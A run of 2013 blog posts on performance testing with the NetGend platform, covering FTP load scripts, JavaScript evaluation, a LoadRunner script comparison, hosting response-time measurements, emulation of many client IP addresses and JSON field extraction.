 6 0.035929000 192.168.5.105 38922 1.1.1.1 80 TSval 66747404  
 7 0.188478000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 8 0.188825000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 9 0.188856000 192.168.5.105 38922 1.1.1.1 80 TSval 66747443  
 10 0.189142000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 11 0.189454000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 12 0.189479000 192.168.5.105 38922 1.1.1.1 80 TSval 66747443  
 13 0.189764000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  

    The second column is the sniffer timestamp (when the packet was captured by the sniffer); the last column is the TCP timestamp.  One challenge here is to find out how much time one unit of TCP timestamp corresponds to - roughly, one unit ≈ (difference in sniffer timestamps) / (difference in TSval).

    Let's take a look at 3 packets whose TCP timestamps changed (packets 4, 5 and 7):

  • Between packets 4 and 5, the TSval differs by 9 (from 1483383927 to 1483383936) and the sniffer timestamps differ by about 36ms (more precisely 35.2ms), so one unit of time is roughly 4ms.
  • Between packets 5 and 7, the TSval differs by 38 (from 1483383936 to 1483383974) and the sniffer timestamps differ by about 153ms; again, one unit of time is roughly 4ms.
    So based on packets 4, 5 and 7, we can conclude that the TCP timestamp changes match those of the sniffer timestamps for these packets, which indicates that the network didn't delay the packets - the big delays between the packets were caused by the server.

    Later on, it was confirmed that the server was running on a cloud-based platform, possibly sharing hardware with some noisy/busy neighbors.  153ms of unexpected delay may not seem like much, but it can accumulate, and not all applications can tolerate it.  Now you know sharing hardware can be a double-edged sword - you have been warned on your road to the cloud :-)
   

Monday, December 2, 2013

Performance testing on ftp servers


    FTP servers were very popular in the 90's, and they are still in use today, mainly to serve large content, especially software packages.  Browsers support them by default, so you may not even notice when you trigger an FTP transaction by clicking a link.  In this blog, we will cover performance testing of FTP servers.

    The NetGend platform supports all the common FTP transactions: ls, get, put and so on.

    First, let's look at an example of uploading a file to a server.  Suppose we need to upload a local file "users.csv" to a remote file "tmp.txt" in the directory "www/test".  Here is the simple script:
 function VUSER() {  
      connect("ftp.example.com", 21);  
      action(ftp, login, "jsmith", "abc123");  
      action(ftp, op, "cd", "www/test");   
      action(ftp, op, "pwd");  
      ftp.data = readFile("users.csv");  
      action(ftp, op, "put", "tmp.txt");  
 }  
     Pretty obvious, isn't it?  Note that in the above script, the variable "ftp.data" holds the data to be sent to the FTP server.  You can generate the data dynamically if you want.
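     For example, the uploaded content could be built on the fly instead of read from a file - a sketch using variables shown elsewhere in these blogs (vuserId, currentTime()):
 ftp.data = "record from VUser ${vuserId} at ${currentTime()}";  //dynamically generated content
 action(ftp, op, "put", "tmp.txt");  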

    The operations "ls" and "get" are even simpler:
 action(ftp, op, "ls");   
 //ftp.recvedData will hold the output of "ls".  

 action(ftp, op, "get", "tmp.txt");   
 //ftp.recvedData will hold the output of content of remote file "tmp.txt"  
    What's interesting here is that, after the operation, the variable "ftp.recvedData" holds the output of the operation: in the case of the "ls" operation, the directory listing; in the case of the "get" operation, the content of the downloaded file.  You can do all the usual operations on this variable, such as using a regexp to grab certain fields and use them in the next FTP operations.
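    For example, here is a sketch that lists a directory, grabs the first file name ending in ".csv" from the listing and downloads it - assuming the same functions shown above and a listing that contains the file name as a plain token:
 function VUSER() {  
      connect("ftp.example.com", 21);  
      action(ftp, login, "jsmith", "abc123");  
      action(ftp, op, "ls");  
      if (match(ftp.recvedData, /(\S+\.csv)/)) {  //grab a file name from the listing
           action(ftp, op, "get", g1);  
           writeFile(g1, ftp.recvedData);  //save the downloaded content locally
      }  
 }  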

    Of course, the following operations are also supported.  They are fairly straightforward.
action(ftp, op, "del", "temp.txt"); 

action(ftp, op, "bye"); 

action(ftp, op, "pwd"); 

     FTP lost to HTTP partly because FTP is simpler - it doesn't have HTTP's fancy extensions.  So let's keep performance testing of FTP simple too.

Saturday, November 30, 2013

Javascript processing in Performance testing


    Thanks to a tweet from Stuart, a guru on performance testing, I checked out the blog by HP LoadRunner that shows how to do authentication with client-side JavaScript evaluation.  One key point in the blog is an interesting LoadRunner function called "web_js_run", which can be used to evaluate a JavaScript code snippet.  In this blog, we are going to show that our NetGend platform also supports JavaScript evaluation, only more easily.

    To paraphrase the test scenario (with a slight change), a client needs to do the following 3 steps:
  • sends a request to an authentication server to get the challenge string,  the server response is in the format of JSON
  • Extracts the last element (the real challenge string) from the JSON string and concatenates it with a local passcode and do the encryption. 
  • sends the encrypted string to the server to get a token (assume authentication is successful).
    Part of the input is two JavaScript files, crypto.js and calcPassword.js, that a browser would use to do the job.
  /////file crypto.js
  function encrypt(data) {   
    return data.toString().split("").reverse().join("");   
  }   
  //simplified encryption to illustrate the point of evaluating javascript on client side

 // file calcPassword.js  
 function extractJson(stringData) {
   var data = JSON.parse(stringData);    
   var index = data[data.length - 1];    
   return data[index]; 
 }
 function getPassword(stringData){    
   return encrypt(extractJson(stringData));    
 }  


    Here is the NetGend script. Note that we have two functions related to JavaScript evaluation:

  • evalJS(..) evaluates JavaScript, either from a file (when the second parameter is "file") or from a string containing a code snippet (the default case).
  • je(..) evaluates a JavaScript function; the first parameter is the JavaScript function name.

 function userInit() {  
    evalJS("crypto.js", "file"); 
    evalJS("calcPassword.js", "file"); 
    //now javascript engine will understand functions "encrypt"  "extractJson"
 }  
 function VUSER() {  
    action(http,"http://localhost:3000/challenge");  
    challenge = je(extractJson, http.replyBody);
    localPasscode = "abc123"; //can also read from a csv file
    password = je(encrypt, "${challenge}${localPasscode}");  
    password = toUrl(password); //encoding password to URL  
    action(http, "http://localhost:3000/token?password=${password}");  
    token = http.replyBody;
 }  

    As a contrast, here is the original LoadRunner script from the blog.  Note that the script would have been much longer if it had to do the concatenation without JavaScript.
 Action()  
 {  
      web_reg_save_param("challenge","LB=","RB=","Search=Body",LAST);  
      web_custom_request("challenge",   
           "URL=http://localhost:3000/challenge",   
           "Method=GET",   
           "RecContentType=application/json",   
           "Snapshot=t1.inf",   
           LAST);  
      web_js_run(  
           "Code=getPassword(LR.getParam('challenge'));",  
           "ResultParam=password",  
           SOURCES,  
           "File=crypto.js", ENDITEM,  
           "File=calcPassword.js", ENDITEM,  
           LAST);  
      web_js_run(  
           "Code='http:/'+'/localhost:3000/token?password=' + encodeURI(LR.getParam('password'));",  
           "ResultParam=uri",  
           LAST);  
      web_custom_request("get token",   
           "URL={uri}",   
           "Method=GET",   
           "RecContentType=application/json"  
           LAST);  
      return 0;  
 }  

    Being able to evaluate JavaScript in performance testing is important. Does your favorite test platform support it? Is it easy?

Thursday, November 28, 2013

Loadrunner script vs NetGend javascript script: a more complete comparison


    After a few blogs with code snippets showing the differences between LoadRunner syntax and NetGend JavaScript syntax, I got an excellent request: "can you compare a full LoadRunner script with a full NetGend JavaScript script?"

    I like this idea because it not only gives a better idea of how the NetGend JavaScript works in more detail, it also shows the possibility of translating a LoadRunner script into a (much simpler) NetGend script.
 
    The LoadRunner script is based on a real one from a production test.  It emulates VUsers performing the following actions: 1) log in to a conference web site, 2) set up a conference, 3) update the conference, 4) cancel the conference and log out.

    To keep this blog a reasonable size, I combined the vuser_init, vuser_end and action parts together and trimmed the number of resources per transaction.  By comparing it with the NetGend script, you can see:

  • Assigning to a parameter like "URL" is much simpler with NetGend Script
  • NetGend functions
    • function names are shorter and easier to remember
    • function parameters are shorter too, they are easier to understand.
  • Variable substitution is very close between the two scripts
    • with Loadrunner, you do it with {VARNAME}
    • with NetGend,  you do it with ${VARNAME}
    • One subtle but important difference on variable substitution 
      • In NetGend, it happens in all strings (including all string parameters of functions), 
      • In Loadrunner, only certain parameters of certain function are capable of doing substitution.
  • On NetGend platform, when there are many resources to download, it will spawn many sessions to retrieve the resources at the same time.
      Here come the scripts; the first one is for LoadRunner, the second one is for NetGend. They are a little long.
 Action()   //Loadrunner script
 {  
      char Url[20];  
      sprintf(Url ,"conference.example.com");  
      lr_save_string (Url,"URL");  
      web_url("Login_conference.example",   
           "URL=http://{URL}/",   
           "Resource=0",   
           "RecContentType=text/html",   
           "Referer=",   
           "Snapshot=t1.inf",   
           "Mode=HTML",   
           EXTRARES,   
           "Url=/images/bg_content04.gif", "Referer=http://{URL}/loginAction!getCookie.action", ENDITEM,   
           "Url=/images/bg_loginLeft_bg01.gif", "Referer=http://{URL}/loginAction!getCookie.action", ENDITEM,   
           LAST);  
      //lr_think_time(21);  
   web_submit_form("loginAction!login.action_2",   
           "Snapshot=t3.inf",   
           ITEMDATA,   
           "Name=password", "Value={Password}", ENDITEM,   
           "Name=vercode", "Value=", ENDITEM,   
           "Name=qsbycookie", "Value=<OFF>", ENDITEM,   
           EXTRARES,   
           "Url=/images/bg_welcome01.gif", "Referer=http://{URL}/mainAction.action", ENDITEM,   
           "Url=/images/bg_contentHome01.jpg", "Referer=http://{URL}/mainAction.action", ENDITEM,   
           LAST);  
   //lr_think_time(8);  
      web_url("conf2_readyForCreate.action",   
           "URL=http://{URL}/reserve/conf2_readyForCreate.action",   
           "Resource=0",   
           "RecContentType=text/html",   
           "Referer=",   
           "Snapshot=t7.inf",   
           "Mode=HTML",   
           EXTRARES,   
           "Url=../css/jquery.datepick.css", ENDITEM,   
           "Url=../images/bg_button07.gif", ENDITEM,   
           LAST);  
      lr_start_transaction("reserve");  
      web_submit_data("conf2_reserve.action",   
           "Action=http://{URL}/reserve/conf2_reserve.action",   
           "Method=POST",   
           "RecContentType=text/html",   
           "Referer=http://{URL}/reserve/conf2_readyForCreate.action",   
           "Snapshot=t11.inf",   
           "Mode=HTML",   
           ITEMDATA,   
           "Name=rv.conferenceId_by", "Value=", ENDITEM,   
           "Name=rv.confStatus", "Value=0", ENDITEM,   
           "Name=rv.confName", "Value=test_per_update", ENDITEM,   
           "Name=rv.dateStart", "Value={Date}", ENDITEM,   
           EXTRARES,   
           "Url=../images/bg_H02.gif", ENDITEM,   
           LAST);  
      lr_end_transaction("reserve");

      web_reg_save_param ("conferenceid","LB=<a href=\"/reserve/confView.action?conferenceid="",
                              RB="\" reserve="">",
         LAST);
 web_url("conf2_list.action", 
  "URL=http://{URL}/reserve/conf2_list.action", 
  "Resource=0", 
  "RecContentType=text/html", 
  "Referer=http://{URL}/mainAction.action", 
  "Snapshot=t6.inf", 
  "Mode=HTML", 
  EXTRARES, 
  "Url=../images/bg_content01.gif", ENDITEM, 
  "Url=../images/bg_content02.gif", ENDITEM, 
  LAST);


 web_url("conf2_readyForUpdate.action", 
  "URL=http://{URL}/reserve/conf2_readyForUpdate.action?conferenceid={conferenceid}", 
  "Resource=0", 
  "RecContentType=text/html", 
  "Referer=http://{URL}/reserve/conf2_list.action", 
  "Snapshot=t14.inf", 
  "Mode=HTML", 
  LAST);

 lr_think_time (30);

 lr_rendezvous("update");

 lr_start_transaction("update");

    web_submit_data("conf2_update.action", 
  "Action=http://{URL}/reserve/conf2_update.action", 
  "Method=POST", 
  "RecContentType=text/html", 
  "Referer=http://{URL}/reserve/conf2_readyForUpdate.action?conferenceid={conferenceid}", 
  "Snapshot=t18.inf", 
  "Mode=HTML", 
  ITEMDATA, 
  "Name=rv.conferenceId_by", "Value={conferenceid}", ENDITEM, 
  "Name=rv.confStatus", "Value=0", ENDITEM, 
  "Name=rv.contactphone", "Value=", ENDITEM, 
  "Name=rv.confName", "Value=test_per_update{NameNumber}", ENDITEM, 
  "Name=rv.dateStart", "Value=2013-11-28", ENDITEM, 
  LAST);

 lr_end_transaction("update", LR_AUTO);
        
 lr_start_transaction("Cancel");

 web_submit_data("conf2_cancel.action", 
  "Action=http://conference.example.com/reserve/conf2_cancel.action", 
  "Method=POST", 
  "RecContentType=text/html", 
  "Referer=http://conference.example.com/reserve/conf2_list.action", 
  "Snapshot=t6.inf", 
  "Mode=HTML", 
  ITEMDATA, 
  "Name=conferenceid", "Value={conferenceid}", ENDITEM, 
  LAST);

 lr_end_transaction("Cancel", LR_AUTO);   
 web_url("logoutAction.action", 
  "URL=http://{URL}/logoutAction.action", 
  "Resource=0", 
  "RecContentType=text/html", 
  "Referer=http://{URL}/reserve/conf2_list.action", 
  "Snapshot=t21.inf", 
  "Mode=HTML", 
  LAST);  
      return 0;  
 }  

     Here is the equivalent script in NetGend Javascript.
 function VUSER() {  //NetGend Javascript
      URL = "conference.example.com";  
      action(http, URL); 
      httpHeader.Refer = "http://${URL}/loginAction!getCookie.action"; 
      spawn( ["/images/bg_content04.gif","/images/bg_loginLeft_bg01.gif"]);  

      //sleep(21);  
      http.POSTData = "password=${Password}&vercode=&qsbycookie=<OFF>";  
      action(http, URL);  
      httpHeader.Referer = "http://${URL}/mainAction.action";  
      spawn( ["/images/bg_welcome01.gif","/images/bg_contentHome01.jpg"]);  

      //sleep(8);  
      action(http,"http://${URL}/reserve/conf2_readyForCreate.action");       
      spawn(["../css/jquery.datepick.css", "../images/bg_button07.gif"]);  

      b."rv.conferenceId_by" = "";  
      b."rv.confStatus" = 0;  
      b."rv.confName" = "test_per_update";  
      b."rv.dateStart" = currentTime();  
      http.POSTData = combineHttpParam(b);  
      httpHeader.Referer = "http://${URL}/reserve/conf2_readyForCreate.action";  
      action(http, "http://${URL}/reserve/conf2_reserve.action");  
      spawn(["../images/bg_H02.gif"]);  

      conferenceid = substring(http.replyBody, "<a href=\"/reserve/confView.action?conferenceid=", "\" >");  
      httpHeader.Refer = "http://${URL}/mainAction.action";
      action(http,"http://${URL}/reserve/conf2_list.action");  
      spawn(["../images/bg_content01.gif", "../images/bg_content02.gif"]);  

      httpHeader.Referer = "http://${URL}/reserve/conf2_list.action";  
      action(http, "http://${URL}/reserve/conf2_readyForUpdate.action?conferenceid=${conferenceid}");  

      sleep(30);
      rendv("update", 40); //gather 40 VUsers here before moving on to next step  

      httpHeader.Referer = "http://${URL}/reserve/conf2_readyForUpdate.action?conferenceid=${conferenceid}";   
      c."rv.conferenceId_by" = conferenceid;  
      c."rv.confStatus"   = 0;  
      c."rv.contactphone"  = "";  
      c."rv.confName"    = "test_per_update${vuserId}";  
      c."rv.dateStart"    = "2013-11-28";  
      http.POSTData = combineHttpParam(c);  
      action(http, "http://${URL}/reserve/conf2_update.action");  

      httpHeader.Referer = "http://conference.example.com/reserve/conf2_list.action";  
      http.POSTData = "conferenceid=${conferenceid}";  
      action(http, "http://conference.example.com/reserve/conf2_cancel.action");  

      httpHeader.Referer = "http://${URL}/reserve/conf2_list.action";  
      action(http, "http://${URL}/logoutAction.action");  
 }  

   

Tuesday, November 26, 2013

Know yourself when choosing the right web hosting 


    There are a lot of web hosting companies out there, and many claim to have some sort of accelerator that can significantly speed up your web pages.  While some claims are true, it's better to put them to the test.

    Recently I looked at a web hosting company, found one of its customers by going to the "testimonials" section, and picked a "happy" customer.  When I opened this customer's site in my browser, I was surprised that it was not that snappy (despite the good words from the "happy" customer).

   To get a better measurement, I opened Chrome's developer console and clicked a new link.  The network tab in the developer tool showed that the main HTML page itself (not counting resources like css, js, images, ...) spent more than 2 seconds just in the "waiting" period.  For those not familiar with the term, the "waiting" period is the time between the transmission of the HTTP request and the arrival of the first byte of the HTTP response.  Interestingly, if I refreshed the page, the waiting time was only a little over 100ms.  The most likely reason is that the data was cold in the database (not in the cache).

   What if I refreshed the page multiple times - what would the waiting times be?  Since it's tedious to do this manually, I used a simple script (in NetGend JavaScript syntax) to do the measurement.  The URL is changed here to keep the web hosting company anonymous.
 function VUSER() {  
      i = 0;  
      while (i < 10) {  
           action(http, "http://www.example.com/somepage");  
           printf("%.2f\n", http.initialRespTime);  
           i ++;  
      }  
 }  
    It produced the following waiting times (in ms):
2890.00
2598.56
84.66
231.31
80.02
72.74
76.44
71.03
74.49
85.11

    From this we can observe that:

  • After the first 2 attempts, the server is fairly responsive.  ~80ms is quite fast considering the network latency itself is about 40ms.
  • Occasionally the latency goes a little higher (like the 231ms above) but is still acceptable; this could be because the server was busy handling other requests.

     We knew the (most likely) reason why the first waiting time was long, but why was the second waiting time high too?  I couldn't think of a reason.  I even looked at a packet capture taken while I ran the test, and it confirmed the timing reported by the test tool.  I can only guess that it was introduced by the acceleration engine of the web hosting infrastructure.

     Based on the numbers, we can see that the accelerator may be working, but does it help you as a site owner?  It depends:

  • If your web site is lightly visited, your visitors may have a not-so-great experience (every page they click will be cold in the database), so the benefit of the accelerator may be questionable.
  • If your site is heavily visited, the majority of visitors will find your site snappy!

     In summary, you, as a site owner, need to know your site before choosing the "right" web hosting service.

Monday, November 25, 2013

Performance testing with different IP addresses



    Recently I saw a web hosting company with a creative approach to charging: by page views on a given day, defined as the number of visitors to the web site with unique IP addresses.  This is interesting in that it protects the site owner from being charged when a hacker uses a tool to generate lots of "hits" on the web site.  Being able to emulate different IP addresses will definitely be helpful for testing such an infrastructure.

   We mentioned in earlier blogs that a NetGend performance test platform can emulate 50,000 VUsers.  In fact, it can maintain 50,000 concurrent TCP sessions.  So, can all the VUsers have unique IP addresses? The answer is yes.

   To do this, we just need to specify the following parameters:
  • Ranges of IP addresses
  • virtual router IP
  • gateway IP 
  • route to servers
    As an example, suppose

  • You connect the test platform to an interface of a router,  the router's interface IP address is 192.168.5.1,  
  • You want to emulate IP addresses in two ranges:  11.1.1.1-11.1.1.100, 12.23.1.5-12.23.1.200,  
  • The target servers have IP addresses in 10.10.10.0/24
    Your configuration can be the following:

 range: 11.1.1.1-11.1.1.100, 12.23.1.5-12.23.1.200  
 virtual router IP: 192.168.5.11  
 gateway IP: 192.168.5.1  
 route to Servers: 10.10.10.0/24  

    Note that the "virtual router IP" above can be considered as a "gateway" to IP addresses in the ranges (client IP addresses).  The physical router will need it to set up route to reach the client IP addresses.

    On many OSes, one can assign multiple IP addresses to an interface, but that approach doesn't scale, in terms of both the time spent on configuration and the number of IP addresses allowed.  One can also try a user-space TCP/IP stack, but it may be missing many features of a standard TCP/IP stack on Windows, Linux or Mac.  On the NetGend platform we use an innovative method to "enable" the OS to have many different IP addresses.  You can ping them to verify.

    Besides testing the above infrastructure, another benefit of using unique IP addresses in performance testing is troubleshooting.  Suppose you have a network sniffer (like Wireshark) that captures all the packets during testing; it will be a nightmare if all the sessions come from the same IP address. With a different IP address for each client, it is much easier to keep track of any one client - a display filter like ip.addr == 11.1.1.57 pulls out all the packets related to that client so you can study them.

   With social media gaining momentum, I am sure there will be more examples of server infrastructure that can make good use of client IP addresses.  Can your favorite performance testing platform support this?

 

Thursday, November 21, 2013

Story of a ghetto coder



    Believe it or not, I was called a ghetto coder when I was doing test automation.  The story goes like this: a software feature was implemented, but it was missing an important capability - "Save As" - so users of the system couldn't save their configurations.  I wrote a tool that extracts the relevant part of the user's configuration for that feature from the system configuration (a big XML blob), saves it to a file, and can restore the configuration from a file.  This workaround served the purpose of "Save As".  I was happy and expected some compliments, but was surprised that one "compliment" was "ghetto coder".  Why?  I did the extraction (from a big XML string) with regular expressions :-(    Later on, I changed the tool to use the tdom package - the official and better way to extract from an XML string - but the nickname remained.  I was actually happy with the outcome, since many colleagues got to know this nickname.  Whenever they needed some tool urgently, they came to this "ghetto coder", and they usually got something working shortly after.  I guess the word "ghetto" has turned into "quick and dirty", and that can be helpful in some cases.

     I was reminded of this story when I saw someone ask a question on performance testing:  given a server response like the following,
{
   "id" : {
    "idUri" : [ "/id/123123" ]
   }
}
how do you extract the field "/id/123123"?   The answer was given using a regular expression:
"idUri" : \[ "([^"]+?)" \]
    While the regular expression works for this particular string, I was worried that if the spacing changed a little (say, some white space was removed or added, or a new line was inserted after "["), the regular expression might fail.

     With NetGend JavaScript, it's fairly easy to extract it:
 a = fromJson(str);  
 //now variable a.id.idUri[0] contains the desired field  
     Here the structure of the variable a.id.idUri[0] follows the hierarchy of the JSON message, so it's fairly easy to understand.  Note in particular that the array ("idUri" in this case) is 0-based, so idUri[0] means its first element.
     This works no matter how the spacing changes. Should there be a second element in the "idUri" array, it can be extracted too (just use a.id.idUri[1] instead).  On top of all this, it is much easier for someone with basic programming skills than the complex regular expression.

    My experience as "ghetto" coder taught me that it's ok to write "ghetto" code,  but you or the users need to be aware of the possible conditions that can cause it to break. Also, if there is an easy way to do the task in a better way (like using tdom package to extract part of xml string), jump on it.